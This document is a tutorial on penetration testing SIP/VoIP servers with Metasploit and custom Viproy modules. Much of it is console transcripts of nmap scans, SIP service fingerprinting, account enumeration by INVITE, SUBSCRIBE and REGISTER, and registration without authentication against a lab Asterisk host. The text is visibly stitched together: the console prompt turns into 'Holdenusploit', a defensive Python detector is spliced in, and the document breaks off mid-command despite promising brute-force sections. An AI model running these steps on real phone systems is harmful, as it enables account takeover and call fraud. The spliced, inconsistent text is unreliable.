Penetration Testing SIP Services



Penetration Testing SIP Services Using Metasploit Framework
Writer: Fatih Özavcı (fatih.ozavci at viproy.com)
Version: 0.2

Introduction

Viproy VoIP Penetration Testing Kit

Table of Contents

1 Discovering SIP Services and Devices
  1.1 Discovering Active SIP Services and Devices
  1.2 Enumerating SIP Services
2 Authentication Analysis of SIP Services
  2.1 SIP Server Registration Without Authentication
  2.2 Brute Forcing Target Accounts
3 Authorization Analysis of SIP Services
  3.1 Direct Invite Attempt

Illustrations

Detecting Active Devices and Port Scan for Services
UDP Discovery for Active Devices
SIP Service Discovery via Generic OPTIONS Auxiliary Module
SIP Service Discovery via OPTIONS Module
SIP Service Discovery via REGISTER Module
Account Enumeration via INVITE Method
Account Enumeration via SUBSCRIBE Method
Account Enumeration via REGISTER Method
Account Enumeration with a User File
SIP Server Registration Without Authentication
Brute Forcing a Valid Account with a Password File
Brute Forcing an Account File with a Password File
Brute Forcing Numeric Accounts with a Password File

1 Discovering SIP Services and Devices

1.1 Discovering Active SIP Services and Devices

Many servers and network devices run SIP services for particular purposes: a commercial service, internal communication within a company, communication between different sites, or simply a default device installation. The first step of a SIP audit is discovering the related devices and mapping the SIP network. This step is required to understand the scope and how the target SIP services are used. The purpose of the SIP services, the type and version of the service software, the device management procedures and the type of SIP clients must be known before penetration testing.

Discovering SIP services is the first step of the audit, and there are many ways to detect SIP devices. Ping sweeps, TCP/UDP sweeps and ARP discovery are available for finding active devices. Most of these methods are not efficient against a well-designed firewall, because only the SIP services may be permitted through it. Discovering an active device is also of little use without identification and enumeration. For this reason, SIP based devices should be identified using service identification and device fingerprints.

Required Minimum Results for the Discovery Step
- IP addresses of active SIP devices
- Operating system and version of active SIP devices
- Service software and version of SIP services
- Role of SIP services (call manager, proxy, gateway)

This chapter explains SIP service analysis with the Metasploit Framework, which has many auxiliary modules for discovering active devices. Ping sweeps and port scanning are the basic discovery methods: active devices can be detected with a ping sweep, and then a port scan can be performed for active services on each detected device. Nmap is the standard network mapping tool, and it is available within the Metasploit Framework for all scanning functions. The -sP parameter selects a ping sweep, and the -PX parameters such as -PI, -PS, -PSA and -PT select the ping type. Port scanning is more complicated: the -sX parameters such as -sS, -sT and -sU define the port scan type. Moreover, each port scan type has different requirements and additional parameters, such as -sV for service identification and -p1-65535 or -F for the target ports. The Nmap manual is very helpful for the different scan types and parameters.

In our example, an ICMP based ping sweep is performed first, then a port scan with OS identification and script modules. When the Nmap scan finishes, the results are stored in the Metasploit Framework database. Scan results are accessible via the hosts, services and vulns commands.

Metasploit # db_nmap -sP -PI 172.16.100.1-10
[*] Nmap: Starting Nmap 6.01 ( http://nmap.org ) at 2012-12-25 15:46 EET
[*] Nmap: Nmap scan report for 172.16.100.1
[*] Nmap: Host is up.
[*] Nmap: Nmap scan report for 172.16.100.6
[*] Nmap: Host is up (0.00060s latency).
[*] Nmap: MAC Address: 08:00:27:38:4E:0A (Cadmus Computer Systems)
[*] Nmap: Nmap done: 10 IP addresses (2 hosts up) scanned in 0.33 seconds

Metasploit # db_nmap -sS -sV -A -O -p1-65535 172.16.100.6
[*] Nmap: Starting Nmap 6.01 ( http://nmap.org ) at 2012-12-25 15:46 EET
[*] Nmap: Nmap scan report for 172.16.100.6
[*] Nmap: Host is up (0.0048s latency).
[*] Nmap: Not shown: 65527 closed ports
[*] Nmap: PORT     STATE SERVICE    VERSION
[*] Nmap: 22/tcp   open  ssh        OpenSSH 4.3 (protocol 2.0)
[*] Nmap: | ssh-hostkey: 1024 1f:e2:e8:9e:2c:f8:31:39:36:f7:1d:aa:77:5e:ac:76 (DSA)
[*] Nmap: |_2048 38:a4:9d:29:8a:11:9d:e1:13:5d:5e:6d:76:a6:63:76 (RSA)
[*] Nmap: 53/tcp   open  domain     dnsmasq 2.45
[*] Nmap: | dns-nsid:
[*] Nmap: |_  bind.version: dnsmasq-2.45
[*] Nmap: 80/tcp   open  http       Apache httpd 2.2.3 ((CentOS))
[*] Nmap: |_http-title: FreePBX
[*] Nmap: | http-methods: Potentially risky methods: TRACE
[*] Nmap: |_See http://nmap.org/nsedoc/scripts/http-methods.html
[*] Nmap: | http-robots.txt: 1 disallowed entry
[*] Nmap: |_/
[*] Nmap: 111/tcp  open  rpcbind (rpcbind V2)  2 (rpc #100000)
[*] Nmap: | rpcinfo:
[*] Nmap: |   program version   port/proto  service
[*] Nmap: |   100000  2         111/tcp     rpcbind
[*] Nmap: |   100000  2         111/udp     rpcbind
[*] Nmap: |   100024  1         746/udp     status
[*] Nmap: |_  100024  1         749/tcp     status
[*] Nmap: 749/tcp  open  status (status V1)    1 (rpc #100024)
[*] Nmap: 3306/tcp open  mysql      MySQL (unauthorized)
[*] Nmap: 4445/tcp open  upnotifyp?
[*] Nmap: 5038/tcp open  asterisk   Asterisk Call Manager 1.1
[*] Nmap: MAC Address: 08:00:27:38:4E:0A (Cadmus Computer Systems)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
[*] Nmap: OS CPE: cpe:/o:linux:kernel:2.6.22
[*] Nmap: OS details: Linux 2.6.22
[*] Nmap: Network Distance: 1 hop
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT     ADDRESS
[*] Nmap: 1   4.77 ms 172.16.100.6
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/.
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 129.76 seconds

Metasploit # hosts

Hosts
=====

address       mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------       ---                ----  -------  ---------  -----  -------  ----  --------
172.16.100.6  08:00:27:38:4E:0A        Linux    2.6.X             device

Metasploit # services

Services
========

host          port  proto  name       state  info
----          ----  -----  ----       -----  ----
172.16.100.6  22    tcp    ssh        open   OpenSSH 4.3 protocol 2.0
172.16.100.6  53    tcp    domain     open   dnsmasq 2.45
172.16.100.6  80    tcp    http       open   Apache httpd 2.2.3 (CentOS)
172.16.100.6  111   tcp    rpcbind    open   2 rpc #100000
172.16.100.6  749   tcp    status     open   1 rpc #100024
172.16.100.6  3306  tcp    mysql      open   MySQL unauthorized
172.16.100.6  4445  tcp    upnotifyp  open
172.16.100.6  5038  tcp    asterisk   open   Asterisk Call Manager 1.1

Illustration: Detecting Active Devices and Port Scan for Services

As you can see, the port scan results contain no information about SIP services, because in most cases SIP is served over UDP. VoIP administrators rarely use SIP over TCP, because it performs worse than SIP over UDP. Our port scan covered only TCP ports (the -sS parameter), and it could not detect any SIP over TCP service.

The Metasploit Framework has a few auxiliary modules for UDP discovery. These modules send valid UDP requests to the related services; open ports on the target then respond, and the response can be used for identification. The auxiliary/scanner/discovery/udp_sweep module is used for UDP scanning, and its results are presented below.

Metasploit # use auxiliary/scanner/discovery/udp_sweep
Metasploit auxiliary(udp_sweep) # show options

Module options (auxiliary/scanner/discovery/udp_sweep):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   CHOST                       no        The local client address
   RHOSTS                      yes       The target address range or CIDR identifier
   THREADS    1                yes       The number of concurrent threads

Metasploit auxiliary(udp_sweep) # set RHOSTS 172.16.100.6
RHOSTS => 172.16.100.6
Metasploit auxiliary(udp_sweep) # set THREADS 10
THREADS => 10
Metasploit auxiliary(udp_sweep) # run
[*] Sending 12 probes to 172.16.100.6->172.16.100.6 (1 hosts)
[*] Discovered DNS on 172.16.100.6:53 (f338858000010001000000000756455253494f4e0442494e440000100003c00c0010000300000000000d0c646e736d6173712d322e3435)
[*] Discovered Portmap on 172.16.100.6:111 (100000 v2 TCP(111), 100000 v2 UDP(111), 100024 v1 UDP(746), 100024 v1 TCP(749))
[*] Scanned 1 of 1 hosts (100% complete)

Metasploit auxiliary(udp_sweep) # services

Services
========

host          port  proto  name       state  info
----          ----  -----  ----       -----  ----
172.16.100.6  22    tcp    ssh        open   OpenSSH 4.3 protocol 2.0
172.16.100.6  53    udp    dns        open   f338858000010001000000000756455253494f4e0442494e440000100003c00c0010000300000000000d0c646e736d6173712d322e3435
172.16.100.6  53    tcp    domain     open   dnsmasq 2.45
172.16.100.6  80    tcp    http       open   Apache httpd 2.2.3 (CentOS)
172.16.100.6  111   udp    portmap    open   100000 v2 TCP(111), 100000 v2 UDP(111), 100024 v1 UDP(746), 100024 v1 TCP(749)
172.16.100.6  111   tcp    sunrpc     open   100000 v2
172.16.100.6  746   udp    sunrpc     open   100024 v1
172.16.100.6  749   tcp    sunrpc     open   100024 v1
172.16.100.6  3306  tcp    mysql      open   MySQL unauthorized
172.16.100.6  4445  tcp    upnotifyp  open
172.16.100.6  5038  tcp    asterisk   open   Asterisk Call Manager 1.1

Illustration: UDP Discovery for Active Devices

Unfortunately this UDP scanning module supports the rpc, dns, netbios, portmap, mssql, ntp, snmp, sentinel and citrix services, not SIP, so it is not efficient for detecting SIP services either. The correct discovery method for a SIP service is sending valid SIP requests to it. Metasploit has an auxiliary module for this purpose, named auxiliary/scanner/sip/options. This module sends an OPTIONS request to the target SIP service, then reports the Server: header and the available methods. In our case, the SIP software is Asterisk PBX 1.6.2.11.

Metasploit # use auxiliary/scanner/sip/options
Metasploit auxiliary(options) # show options

Module options (auxiliary/scanner/sip/options):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   CHOST                       no        The local client address
   CPORT      5060             no        The local client port
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      5060             yes       The target port
   THREADS    1                yes       The number of concurrent threads
   TO         nobody           no        The destination username to

Metasploit auxiliary(options) # set RHOSTS 172.16.100.6
RHOSTS => 172.16.100.6
Metasploit auxiliary(options) # run
[*] 172.16.100.6 200 server='Asterisk PBX 1.6.2.11' verbs='INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO'
[*] Scanned 1 of 1 hosts (100% complete)

Illustration: SIP Service Discovery via Generic OPTIONS Auxiliary Module

I developed a SIP library for the Metasploit Framework and a few modules to demonstrate it, such as the OPTIONS module named auxiliary/gamasec/sip/gsipoptions. It is useful for service detection and for discovering additional information about the target service. Sample usage of this module is presented below.

Metasploit # use auxiliary/gamasec/sip/gsipoptions
Metasploit auxiliary(gsipoptions) # set RHOSTS 172.16.100.6
RHOSTS => 172.16.100.6
Metasploit auxiliary(gsipoptions) # set VERBOSE true
VERBOSE => true
Metasploit auxiliary(gsipoptions) # show options

Module options (auxiliary/gamasec/sip/gsipoptions):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT    5065             no        The local client port
   DEBUG    0                no        Debug Level
   FROM     100              yes       The source username to probe at each host
   REALM    realm.com.tr     yes       The login realm to probe at each host
   RHOSTS   172.16.100.6     yes       The target address range or CIDR identifier
   RPORT    5060             yes       The target port
   THREADS  1                yes       The number of concurrent threads
   TO       100              yes       The destination username to probe at each host

Metasploit auxiliary(gsipoptions) # run
[+] 172.16.100.6:5060 Response: 200 OK
[*] Server : Asterisk PBX 1.6.2.11
[*] Scanned 1 of 1 hosts (100% complete)

Illustration: SIP Service Discovery via OPTIONS Module

OPTIONS is not the only method for discovering a SIP service; other methods may be required under IP or request based filtering. For this reason the other modules I developed, REGISTER, INVITE and SUBSCRIBE, can also be used for discovery. A discovery attempt based on the REGISTER method is presented below. The REGISTER module is named auxiliary/gamasec/sip/gsipregister. When run with default parameters, it reports that the target SIP service requires authentication. If the target number TO is changed to 100 and the login parameter USER_AS_FROM_and_TO is changed to false, it reports that the target service accepts the registration. As this example shows, discovering and understanding a SIP service requires a few probes. Other options or other modules such as INVITE and SUBSCRIBE can also be used for discovery.

Metasploit # use auxiliary/gamasec/sip/gsipregister
Metasploit auxiliary(gsipregister) # set RHOSTS 172.16.100.6
RHOSTS => 172.16.100.6
Metasploit auxiliary(gsipregister) # show options

Module options (auxiliary/gamasec/sip/gsipregister):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   CHOST                                 no        The local client address
   CPORT                5065             no        The local client port
   DEBUG                false            no        Debug Level
   DEREGISTER           false            yes       DeRegister After Successful Login
   FROM                 1000             no        The source username to
   LOGIN                false            yes       Login Using Credentials
   PASSWORD             NOPASSWORD       yes       The login password to
   REALM                realm.com.tr     yes       The login realm to
   RHOSTS               172.16.100.6     yes       The target address range or CIDR identifier
   RPORT                5060             yes       The target port
   THREADS              1                yes       The number of concurrent threads
   TO                   1000             no        The destination username to
   USERNAME             NOUSER           yes       The login username to
   USER_AS_FROM_and_TO  true             no        Use the Username for From and To fields

Metasploit auxiliary(gsipregister) # run
[+] 172.16.100.6:5060 Credentials Required : SIP/2.0 401 Unauthorized
[*] Server : Asterisk PBX 1.6.2.11
[*] Realm : asterisk
[*] Scanned 1 of 1 hosts (100% complete)
Metasploit auxiliary(gsipregister) # set TO 100
TO => 100
Metasploit auxiliary(gsipregister) # set USER_AS_FROM_and_TO false
USER_AS_FROM_and_TO => false
Metasploit auxiliary(gsipregister) # run
[+] 172.16.100.6:5060 Response: 200 OK
[*] Server : Asterisk PBX 1.6.2.11
[*] Scanned 1 of 1 hosts (100% complete)

Illustration: SIP Service Discovery via REGISTER Module

Other tools such as sipsak, sipp or sipvicious can be used for detection or identification, but these tools have disadvantages and fewer features, and they cannot be integrated into a penetration testing framework. For that reason they are not recommended for the discovery and identification step of a penetration test.

1.2 Enumerating SIP Services

Enumeration is required for feature and authorization testing of SIP services. Valid accounts, the internal call schema, the dial plan, special dial targets, prefixes for gateways, value added services and the voice message box should be defined as enumeration targets. Enumeration is possible with different SIP requests such as OPTIONS, REGISTER, SUBSCRIBE and INVITE. The enumeration step should be defined carefully and all available methods should be used, because each request type has its own conditions and responses. Different types of enumeration are presented in this chapter; each method should be performed against the target SIP services.

Required Minimum Results for the Enumeration Step
- Valid prefixes and special gateways on the SIP service
- Valid accounts and target numbers on the SIP service
- Voice message box of the SIP service
- Accounts or numbers without a password on the SIP service

The INVITE method initiates a call to the target number on a SIP service, with or without authentication. The server may send different responses for some TO fields in INVITE requests, such as 404 Not Found, 401 Unauthorized or 403 Forbidden, and this difference should be the basis for enumeration. For example, if 401 Unauthorized or 200 OK responses are received only for valid targets, the enumeration should search for all users that return 401 Unauthorized or 200 OK; those users are then identified as a valid account, target number, value added service or gateway. If authentication is required before INVITE requests, the enumeration should be designed for that.

My SIP enumeration module can be used for INVITE based enumeration. It supports the REGISTER, SUBSCRIBE and INVITE methods for enumerating target accounts, and it is also useful for enumerating and identifying value added services, prefixes, gateways and number based trunks. The module supports authentication: if the server requires authentication, it calculates the nonce response and sends it with the given credentials. The authentication feature is activated with the LOGIN, USERNAME, PASSWORD and REALM variables. In this example the INVITE method is selected with NUMERIC_USERS, and the NUMERIC_MAX variable limits the enumeration. Double responses mean that the server sends multiple 200 OK or 401 Unauthorized results; this is a side effect of a direct INVITE request. Another side effect of INVITE is that all detected numbers will ring.

Metasploit # use auxiliary/gamasec/sip/gsipenumerator
Metasploit auxiliary(gsipenumerator) # set METHOD INVITE
METHOD => INVITE
Metasploit auxiliary(gsipenumerator) # unset USERNAME
Unsetting USERNAME...
Metasploit auxiliary(gsipenumerator) # set NUMERIC_USERS true
NUMERIC_USERS => true
Metasploit auxiliary(gsipenumerator) # set NUMERIC_MAX 2100
NUMERIC_MAX => 2100
Metasploit auxiliary(gsipenumerator) # show options

Module options (auxiliary/gamasec/sip/gsipenumerator):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
   CHOST                                 no        The local client address
   CPORT                5065             no        The local client port
   DEBUG                false            no        Debug Level
   FROM                 1000             no        The source username to
   METHOD               INVITE           yes       Method for Brute Force (SUBSCRIBE,REGISTER,INVITE)
   NUMERIC_MAX          2100             yes       Ending extension
   NUMERIC_MIN          0                yes       Starting extension
   NUMERIC_USERS        true             yes       Numeric Username Bruteforcing
   REALM                realm.com.tr     yes       The login realm to
   RHOST                172.16.100.6     yes       The target address
   RPORT                5060             yes       The target port
   STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
   THREADS              1                yes       The number of concurrent threads
   TO                   1000             no        The destination username to
   USERNAME             NOUSER           no        The login username to
   USER_AS_FROM_and_TO  true             yes       Try the username as the password for all users
   USER_FILE                             no        File containing usernames, one per line
   VERBOSE              false            yes       Whether to print output for all attempts

Metasploit auxiliary(gsipenumerator) # run
[+] user : 101 is Found, Server Response: 401 Unauthorized
[+] user : 102 is Found, Server Response: 401 Unauthorized
[+] user : 200 is Found, Server Response: 401 Unauthorized
[+] user : 201 is Found, Server Response: 401 Unauthorized
[+] user : 2000 is Found, Server Response: 401 Unauthorized
[+] user : 200 is Found, Server Response: 401 Unauthorized
[+] user : 201 is Found, Server Response: 401 Unauthorized
[+] user : 2000 is Found, Server Response: 401 Unauthorized

Illustration: Account Enumeration via INVITE Method

The SUBSCRIBE method subscribes an account to the target SIP service, with or without authentication. The server may send different responses for some TO fields in SUBSCRIBE requests, such as 404 Not Found, 401 Unauthorized or 403 Forbidden, and this difference should be the basis for enumeration. For example, if 401 Unauthorized or 200 OK responses are received only for valid targets, the enumeration should search for all users that return 401 Unauthorized or 200 OK; those users are then identified as a valid account, target number, value added service or gateway. If the server sends different responses for SUBSCRIBE requests, SUBSCRIBE should be the first enumeration method, because it causes less damage than INVITE or REGISTER.

As mentioned above, my SIP enumeration module can be used for SUBSCRIBE based enumeration; it is useful for enumerating and identifying value added services, prefixes, gateways and number based trunks. The module supports authentication: if the server requires authentication, it calculates the nonce response and sends it with the given credentials. The authentication feature is activated with the LOGIN, USERNAME, PASSWORD and REALM variables. In this example the SUBSCRIBE method is selected with NUMERIC_USERS, and the NUMERIC_MAX variable limits the enumeration.

Metasploit # use auxiliary/gamasec/sip/gsipenumerator
Metasploit auxiliary(gsipenumerator) # unset USERNAME
Unsetting USERNAME...
Metasploit auxiliary(gsipenumerator) # set NUMERIC_USERS true
NUMERIC_USERS => true
Metasploit auxiliary(gsipenumerator) # set NUMERIC_MAX 2100
NUMERIC_MAX => 2100
Metasploit auxiliary(gsipenumerator) # set METHOD SUBSCRIBE
METHOD => SUBSCRIBE
Metasploit auxiliary(gsipenumerator) # show options

Module options (auxiliary/gamasec/sip/gsipenumerator):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
   CHOST                                 no        The local client address
   CPORT                5065             no        The local client port
   DEBUG                false            no        Debug Level
   FROM                 1000             no        The source username to
   METHOD               SUBSCRIBE        yes       Method for Brute Force (SUBSCRIBE,REGISTER,INVITE)
   NUMERIC_MAX          2100             yes       Ending extension
   NUMERIC_MIN          0                yes       Starting extension
   NUMERIC_USERS        true             yes       Numeric Username Bruteforcing
   REALM                realm.com.tr     yes       The login realm to
   RHOST                172.16.100.6     yes       The target address
   RPORT                5060             yes       The target port
   STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
   THREADS              1                yes       The number of concurrent threads
   TO                   1000             no        The destination username to
   USERNAME             NOUSER           no        The login username to
   USER_AS_FROM_and_TO  true             yes       Try the username as the password for all users
   USER_FILE                             no        File containing usernames, one per line
   VERBOSE              false            yes       Whether to print output for all attempts

Metasploit auxiliary(gsipenumerator) # run
[+] user : 101 is Found, Server Response: 401 Unauthorized
[+] user : 102 is Found, Server Response: 401 Unauthorized
[+] user : 200 is Found, Server Response: 401 Unauthorized
[+] user : 201 is Found, Server Response: 401 Unauthorized
[+] user : 2000 is Found, Server Response: 401 Unauthorized

Illustration: Account Enumeration via SUBSCRIBE Method

The REGISTER method is used to register an account with the target SIP service, with or without authentication. The server may send different responses for different TO fields in REGISTER requests, such as 404 Not Found, 401 Unauthorized or 403 Forbidden, and this difference should be the basis for enumeration. For example, if 401 Unauthorized or 200 OK responses are received only for valid targets, an enumeration should be defined to search for all users that return 401 Unauthorized or 200 OK. Based on this fact, users with 401 Unauthorized or 200 OK responses should be identified as a valid account, target number, VAS (value added service) or gateway. As mentioned above, my SIP enumeration module can be used for REGISTER based enumeration. This module is useful for enumerating and identifying value added services, prefixes, gateways or number based trunks. The REGISTER method is selected together with NUMERIC_USERS in this example, and the NUMERIC_MAX variable is defined to limit the enumeration.

    Holdenusploit # use auxiliary/gamasec/sip/gsipenumerator
    Holdenusploit auxiliary(gsipenumerator) # set METHOD REGISTER
    METHOD => REGISTER
    Holdenusploit auxiliary(gsipenumerator) # set NUMERIC_MAX 2100
    NUMERIC_MAX => 2100
    Holdenusploit auxiliary(gsipenumerator) # unset USERNAME
    Unsetting USERNAME...
    Holdenusploit auxiliary(gsipenumerator) # show options

    Module options (auxiliary/gamasec/sip/gsipenumerator):

       Name                 Current Setting  Required  Description
       ----                 ---------------  --------  -----------
       BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
       CHOST                                 no        The local client address
       CPORT                5065             no        The local client port
       DEBUG                false            no        Debug Level
       FROM                 1000             no        The source username to probe
       METHOD               REGISTER         yes       Method for Brute Force (SUBSCRIBE,REGISTER,INVITE)
       NUMERIC_MAX          2100             yes       Ending extension
       NUMERIC_MIN          0                yes       Starting extension
       NUMERIC_USERS        true             yes       Numeric Username Bruteforcing
       REALM                realm.com.tr     yes       The login realm to probe
       RHOST                172.16.100.6     yes       The target address
       RPORT                5060             yes       The target port
       STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
       THREADS              1                yes       The number of concurrent threads
       TO                   1000             no        The destination username to probe
       USERNAME             NOUSER           no        The login username to probe
       USER_AS_FROM_and_TO  true             yes       Try the username as the password for all users
       USER_FILE                             no        File containing usernames, one per line
       VERBOSE              false            yes       Whether to print output for all attempts

    Holdenusploit auxiliary(gsipenumerator) # run
    [+] user : 100 is Found, Server Response: 200 OK

Account Enumeration via REGISTER Method

Viproy VoIP Penetration Testing Kit, Page 17

SIP service accounts can be alphanumeric, which means numeric REGISTER enumeration cannot be performed against this type of system. In this situation, other enumeration methods should be used, or a wordlist based brute force should be performed. Wordlist based REGISTER enumeration requires a large user list to confirm accounts. My enumeration module supports this type of enumeration too; it is available for all enumeration types. The user list should be defined in the USER_FILE variable, and the NUMERIC_USERS variable should be set to false. In the next example, the 3 enumeration types are performed with a wordlist.

    Holdenusploit # use auxiliary/gamasec/sip/gsipenumerator
    Holdenusploit auxiliary(gsipenumerator) # set NUMERIC_USERS false
    NUMERIC_USERS => false
    Holdenusploit auxiliary(gsipenumerator) # set METHOD REGISTER
    METHOD => REGISTER
    Holdenusploit auxiliary(gsipenumerator) # set USER_FILE "/tmp/users"
    USER_FILE => /tmp/users
    Holdenusploit auxiliary(gsipenumerator) # run
    [+] user : 100 is Found, Server Response: 200 OK
    Holdenusploit auxiliary(gsipenumerator) # set METHOD SUBSCRIBE
    METHOD => SUBSCRIBE
    Holdenusploit auxiliary(gsipenumerator) # run
    [+] user : 2000 is Found, Server Response: 401 Unauthorized
    Holdenusploit auxiliary(gsipenumerator) # set METHOD INVITE
    METHOD => INVITE
    Holdenusploit auxiliary(gsipenumerator) # run
    [+] user : 2000 is Found, Server Response: 401 Unauthorized

Account Enumeration with a User File

The REGISTER response and the SUBSCRIBE/INVITE responses differ, because each account is enumerated under its own conditions. 100 is a special account; it does not need any password authentication with the REGISTER method. REGISTER only identifies 100, because 2000 and the other, invalid numbers need authentication. SUBSCRIBE only identifies 2000, because the SUBSCRIBE method is not available for 100. INVITE only identifies 2000, because the call conditions of 100 are different from those of other accounts. All methods should be performed for full enumeration and discovery, because every method has advantages and disadvantages.

Another important case is server specific behaviour. The OPTIONS method is used to check the state of a remote SIP service and its valid SIP methods. Servers and clients use this method to confirm their connection and the availability of the service. Normally, the OPTIONS method should return the same 200 OK result for all accounts and numbers. In some cases, the server may send different responses for some FROM or TO fields in OPTIONS requests, and this difference should be the basis for enumeration. For example, if a 404 Not Found response is received for all numbers except valid accounts, an enumeration should be defined to search for all users without 404 Not Found. Based on this fact, users without a 404 Not Found response should be valid accounts, target numbers or both. This type of special enumeration case can be performed with a few modifications to my module.
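From the defender's side, the enumeration described above has a simple signature: one source probes many distinct TO users with REGISTER, SUBSCRIBE, INVITE or OPTIONS, and the registrar's status codes differ per user. The following detector is an added example written for this document (it is not part of the Viproy modules or of any PBX); it runs over a constructed request log whose format, source addresses and line layout are assumptions, and whose responses mirror the behaviour shown above (REGISTER answers 200 OK for the special number 100 and 401 for everything else, SUBSCRIBE and INVITE answer 401 only for the real account 2000). It also flags the complementary pattern, one source repeatedly receiving 403 for the same user, which is what password guessing against a confirmed account looks like.

```python
from collections import Counter, defaultdict

# Added example for this document; not part of the Viproy modules.
# Constructed registrar request log (not real Asterisk output), one request per
# line as "<src_ip> <method> <to_user> <status>".  Status codes follow the
# behaviour described in the text: REGISTER gives 200 for the unauthenticated
# number 100 and 401 for all other users; SUBSCRIBE and INVITE give 401 only
# for the real account 2000 and 404 otherwise; 403 is a failed credential.
SAMPLE_LOG = """
10.0.0.7 REGISTER 1998 401
10.0.0.7 REGISTER 1999 401
10.0.0.7 REGISTER 2000 401
10.0.0.7 REGISTER 2001 401
10.0.0.7 REGISTER 100 200
10.0.0.7 SUBSCRIBE 2000 401
10.0.0.7 SUBSCRIBE 2001 404
10.0.0.7 SUBSCRIBE 2002 404
10.0.0.7 INVITE 2000 401
10.0.0.7 INVITE 2003 404
10.0.0.9 REGISTER 2000 401
10.0.0.9 REGISTER 2000 403
10.0.0.9 REGISTER 2000 403
10.0.0.9 REGISTER 2000 403
10.0.0.9 REGISTER 2000 403
10.0.0.9 REGISTER 2000 403
10.0.0.9 REGISTER 2000 403
192.168.1.20 REGISTER 2000 401
192.168.1.20 REGISTER 2000 200
"""

# Methods the text uses for enumeration; OPTIONS covers the server-specific case.
ENUM_METHODS = {"REGISTER", "SUBSCRIBE", "INVITE", "OPTIONS"}


def parse_line(line):
    """Split one log line into a dict; return None for blank or malformed lines."""
    parts = line.split()
    if len(parts) != 4 or not parts[3].isdigit():
        return None
    src, method, to_user, status = parts
    return {"src": src, "method": method.upper(), "to": to_user, "status": status}


def analyze(log_text, min_distinct_targets=5, min_bad_auth=5):
    """Return alerts for account enumeration and for password guessing.

    Enumeration is keyed on breadth (distinct TO users per source), not on
    status codes, so it still fires when the registrar answers every user
    with a uniform 401; the per-source status histogram is kept so an analyst
    can see which method leaked a difference.  A 401 is the normal challenge
    every legitimate REGISTER receives first, so only 403 counts as a failure.
    """
    targets = defaultdict(set)        # src -> distinct TO users probed
    responses = defaultdict(Counter)  # src -> status code histogram
    bad_auth = Counter()              # (src, user) -> number of 403 replies
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] not in ENUM_METHODS:
            continue
        targets[rec["src"]].add(rec["to"])
        responses[rec["src"]][rec["status"]] += 1
        if rec["status"] == "403":
            bad_auth[(rec["src"], rec["to"])] += 1

    alerts = []
    for src in sorted(targets):
        if len(targets[src]) >= min_distinct_targets:
            alerts.append({"type": "enumeration", "src": src,
                           "distinct_targets": len(targets[src]),
                           "responses": dict(responses[src])})
    for (src, user), count in sorted(bad_auth.items()):
        if count >= min_bad_auth:
            alerts.append({"type": "password_guessing", "src": src,
                           "user": user, "bad_auth": count})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

On the sample, 10.0.0.7 is reported for touching seven distinct users with a mixed 401/200/404 profile, 10.0.0.9 for six 403 replies against 2000, and the phone at 192.168.1.20 (one challenge, then 200 OK) is not reported. A production version would bucket by time window and raise thresholds for trunks that legitimately address many numbers. On Asterisk, sip.conf's alwaysauthreject=yes makes unknown and known users receive the same 401, which removes the response difference the enumeration above depends on; the breadth rule catches the scan regardless.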

2 Authentication Analysis of SIP Services

2.1 SIP Server Registration Without Authentication

The authentication function depends on the features and role of the SIP service. Authentication may not be required or initiated on SIP trunks, SIP clients and default installations. Generally, SIP trunks are defined by an IP address or a specific FROM number. Challenge-response or certificate based authentication is too slow to give quick responses at this kind of large call volume. Because of that, SIP trunks either have no password or use an IP based filter for trunk authentication. These SIP trunks use specific FROM numbers or Proxy fields to initiate a call. Many SIP clients support REGISTER and INVITE without authentication. SIP servers and devices cannot authenticate users without the right configuration, and most default installations do not support authentication. Moreover, SIP servers have special target numbers that accept calls for voice message boxes, value added services or gateways. Registration without a password is possible in this kind of configuration. Based on this information, all SIP servers should be analyzed for weak authentication and for special target numbers without authentication.

The REGISTER method is used to register with a SIP server, and this method also supports authentication. In this example, the SIP server is analyzed for REGISTER without authentication. My register module can be used for REGISTER tests; it supports the basic REGISTER options. 2000 is a valid username and NOUSER is an invalid username for this SIP server. First, the SIP server is analyzed with the USERNAME variable (in this case NOUSER and 2000), and 401 Unauthorized is received.

    Holdenusploit # use auxiliary/gamasec/sip/gsipregister
    Holdenusploit auxiliary(gsipregister) # show options

    Module options (auxiliary/gamasec/sip/gsipregister):

       Name                 Current Setting  Required  Description
       ----                 ---------------  --------  -----------
       CHOST                                 no        The local client address
       CPORT                5065             no        The local client port
       DEBUG                false            no        Debug Level
       DEREGISTER           false            yes       DeRegister After Successful Login
       FROM                 1000             no        The source username to probe
       LOGIN                false            yes       Login Using Credentials
       PASSWORD             NOPASSWORD       yes       The login password to probe
       REALM                realm.com.tr     yes       The login realm to probe
       RHOSTS                                yes       The target address range or CIDR identifier
       RPORT                5060             yes       The target port
       THREADS              1                yes       The number of concurrent threads
       TO                   1000             no        The destination username to probe
       USERNAME             NOUSER           yes       The login username to probe
       USER_AS_FROM_and_TO  true             no        Use the Username for From and To fields

    Holdenusploit auxiliary(gsipregister) # set RHOSTS 172.16.100.6
    RHOSTS => 172.16.100.6
    Holdenusploit auxiliary(gsipregister) # run
